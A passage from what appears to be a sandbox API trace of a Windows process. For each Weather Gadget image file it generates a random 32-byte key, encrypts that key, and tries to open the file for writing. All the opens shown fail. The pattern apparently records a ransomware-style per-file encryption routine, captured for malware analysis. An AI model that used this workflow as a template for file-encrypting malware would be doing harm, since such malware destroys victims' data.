dwLen=0x20, pbBuffer=0x248ea20 | out: pbBuffer=0x248ea20) returned 1 [0160.638] GetProcessHeap () returned 0x2c0000 [0160.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.638] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248ea18*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248ea18*=0x30) returned 1 [0160.638] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-gibbous_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.639] GetProcessHeap () returned 0x2c0000 [0160.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.639] GetProcessHeap () returned 0x2c0000 [0160.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3bbf0 | out: hHeap=0x2c0000) returned 1 [0160.639] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea18 | out: pbBuffer=0x248ea18) returned 1 [0160.639] GetProcessHeap () returned 0x2c0000 [0160.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.639] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248ea10*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248ea10*=0x30) returned 1 [0160.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-crescent_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.641] GetProcessHeap () returned 0x2c0000 [0160.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.641] GetProcessHeap () returned 0x2c0000 [0160.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7ad8 | out: hHeap=0x2c0000) returned 1 [0160.641] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea18 | out: pbBuffer=0x248ea18) returned 1 [0160.641] GetProcessHeap () returned 0x2c0000 [0160.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.641] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248ea10*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248ea10*=0x30) returned 1 [0160.641] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-new_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.643] GetProcessHeap () returned 0x2c0000 [0160.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.643] GetProcessHeap () returned 0x2c0000 [0160.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f470d0 | out: hHeap=0x2c0000) returned 1 [0160.643] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea10 | out: pbBuffer=0x248ea10) returned 1 [0160.643] GetProcessHeap () returned 0x2c0000 [0160.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.643] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248ea08*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248ea08*=0x30) returned 1 [0160.643] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-last-quarter_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-last-quarter_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.644] GetProcessHeap () returned 0x2c0000 [0160.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.645] GetProcessHeap () returned 0x2c0000 [0160.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3baa8 | out: hHeap=0x2c0000) returned 1 [0160.645] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea10 | out: pbBuffer=0x248ea10) returned 1 [0160.645] GetProcessHeap () returned 0x2c0000 [0160.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.645] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248ea08*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248ea08*=0x30) returned 1 [0160.645] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-full_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-full_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.646] GetProcessHeap () returned 0x2c0000 [0160.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.646] GetProcessHeap () returned 0x2c0000 [0160.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46f98 | out: hHeap=0x2c0000) returned 1 [0160.647] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea08 | out: pbBuffer=0x248ea08) returned 1 [0160.647] GetProcessHeap () returned 0x2c0000 [0160.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.647] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248ea00*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248ea00*=0x30) returned 1 [0160.647] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-first-quarter_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-first-quarter_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.651] GetProcessHeap () returned 0x2c0000 [0160.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.651] GetProcessHeap () returned 0x2c0000 [0160.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7990 | out: hHeap=0x2c0000) returned 1 [0160.651] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea08 | out: pbBuffer=0x248ea08) returned 1 [0160.651] GetProcessHeap () returned 0x2c0000 [0160.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.651] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248ea00*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248ea00*=0x30) returned 1 [0160.651] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_hail.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_hail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.656] GetProcessHeap () returned 0x2c0000 [0160.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.656] GetProcessHeap () returned 0x2c0000 [0160.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3f5a0 | out: hHeap=0x2c0000) returned 1 [0160.656] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea00 | out: pbBuffer=0x248ea00) returned 1 [0160.656] GetProcessHeap () returned 0x2c0000 [0160.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.657] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9f8*=0x30) returned 1 [0160.657] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked-loading.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.659] GetProcessHeap () returned 0x2c0000 [0160.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.659] GetProcessHeap () returned 0x2c0000 [0160.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f426f0 | out: hHeap=0x2c0000) returned 1 [0160.659] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea00 | out: pbBuffer=0x248ea00) returned 1 [0160.659] GetProcessHeap () returned 0x2c0000 [0160.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.659] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9f8*=0x30) returned 1 [0160.659] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\notconnectedstateicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.661] GetProcessHeap () returned 0x2c0000 [0160.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.661] GetProcessHeap () returned 0x2c0000 [0160.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3f140 | out: hHeap=0x2c0000) returned 1 [0160.661] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9f8 | out: pbBuffer=0x248e9f8) returned 1 [0160.661] GetProcessHeap () returned 0x2c0000 [0160.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.661] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9f0*=0x30) returned 1 [0160.661] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\greenstateicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.663] GetProcessHeap () returned 0x2c0000 [0160.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.663] GetProcessHeap () returned 0x2c0000 [0160.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44328 | out: hHeap=0x2c0000) returned 1 [0160.663] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9f8 | out: pbBuffer=0x248e9f8) returned 1 [0160.663] GetProcessHeap () returned 0x2c0000 [0160.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.663] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9f0*=0x30) returned 1 [0160.663] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_thunderstorm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.665] GetProcessHeap () returned 0x2c0000 [0160.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.665] GetProcessHeap () returned 0x2c0000 [0160.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3f028 | out: hHeap=0x2c0000) returned 1 [0160.665] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9f0 | out: pbBuffer=0x248e9f0) returned 1 [0160.665] GetProcessHeap () returned 0x2c0000 [0160.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.665] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9e8*=0x30) returned 1 [0160.665] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_rainy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_rainy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.666] GetProcessHeap () returned 0x2c0000 [0160.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.666] GetProcessHeap () returned 0x2c0000 [0160.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f423d8 | out: hHeap=0x2c0000) returned 1 [0160.667] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9f0 | out: pbBuffer=0x248e9f0) returned 1 [0160.667] GetProcessHeap () returned 0x2c0000 [0160.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.667] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9e8*=0x30) returned 1 [0160.667] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_foggy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_foggy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.673] GetProcessHeap () returned 0x2c0000 [0160.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.673] GetProcessHeap () returned 0x2c0000 [0160.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f421c8 | out: hHeap=0x2c0000) returned 1 [0160.674] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9e8 | out: pbBuffer=0x248e9e8) returned 1 [0160.674] GetProcessHeap () returned 0x2c0000 [0160.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.674] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9e0*=0x30) returned 1 [0160.674] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_sun.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_sun.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.675] GetProcessHeap () returned 0x2c0000 [0160.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.675] GetProcessHeap () returned 0x2c0000 [0160.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41eb0 | out: hHeap=0x2c0000) returned 1 [0160.675] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9e8 | out: pbBuffer=0x248e9e8) returned 1 [0160.675] GetProcessHeap () returned 0x2c0000 [0160.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.676] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9e0*=0x30) returned 1 [0160.676] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.677] GetProcessHeap () returned 0x2c0000 [0160.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.677] GetProcessHeap () returned 0x2c0000 [0160.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3edf8 | out: hHeap=0x2c0000) returned 1 [0160.677] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9e0 | out: pbBuffer=0x248e9e0) returned 1 [0160.677] GetProcessHeap () returned 0x2c0000 [0160.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.678] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9d8*=0x30) returned 1 [0160.678] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.679] GetProcessHeap () returned 0x2c0000 [0160.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.679] GetProcessHeap () returned 0x2c0000 [0160.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3ece0 | out: hHeap=0x2c0000) returned 1 [0160.679] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9e0 | out: pbBuffer=0x248e9e0) returned 1 [0160.679] GetProcessHeap () returned 0x2c0000 [0160.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.679] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9d8*=0x30) returned 1 [0160.680] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_rainy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.681] GetProcessHeap () returned 0x2c0000 [0160.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.681] GetProcessHeap () returned 0x2c0000 [0160.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41a90 | out: hHeap=0x2c0000) returned 1 [0160.681] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9d8 | out: pbBuffer=0x248e9d8) returned 1 [0160.682] GetProcessHeap () returned 0x2c0000 [0160.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.682] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9d0*=0x30) returned 1 [0160.682] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-gibbous.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.683] GetProcessHeap () returned 0x2c0000 [0160.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.683] GetProcessHeap () returned 0x2c0000 [0160.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f490a0 | out: hHeap=0x2c0000) returned 1 [0160.684] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9d8 | out: pbBuffer=0x248e9d8) returned 1 [0160.684] GetProcessHeap () returned 0x2c0000 [0160.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.684] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9d0*=0x30) returned 1 [0160.684] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-crescent.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.696] GetProcessHeap () returned 0x2c0000 [0160.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.696] GetProcessHeap () returned 0x2c0000 [0160.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f48f78 | out: hHeap=0x2c0000) returned 1 [0160.696] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9d0 | out: pbBuffer=0x248e9d0) returned 1 [0160.696] GetProcessHeap () returned 0x2c0000 [0160.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.696] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9c8*=0x30) returned 1 [0160.697] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-crescent.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.698] GetProcessHeap () returned 0x2c0000 [0160.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.698] GetProcessHeap () returned 0x2c0000 [0160.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f48d28 | out: hHeap=0x2c0000) returned 1 [0160.698] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9d0 | out: pbBuffer=0x248e9d0) returned 1 [0160.698] GetProcessHeap () returned 0x2c0000 [0160.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.698] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9c8*=0x30) returned 1 [0160.698] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-new.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.700] GetProcessHeap () returned 0x2c0000 [0160.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.700] GetProcessHeap () returned 0x2c0000 [0160.700] HeapFree (in: hHeap=0x2c0000, 